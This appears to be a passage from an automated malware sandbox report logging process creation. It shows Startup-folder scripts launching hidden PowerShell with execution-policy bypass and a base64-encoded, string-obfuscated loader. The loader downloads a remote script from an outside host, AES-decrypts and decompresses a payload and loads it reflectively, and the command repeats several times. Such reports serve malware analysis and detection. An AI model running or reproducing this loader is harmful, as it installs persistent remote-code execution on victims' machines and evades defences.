AuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4a774a3c.cmd" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_25a2536c.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a960cfa7.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_e29f9ec9.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f7534387.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7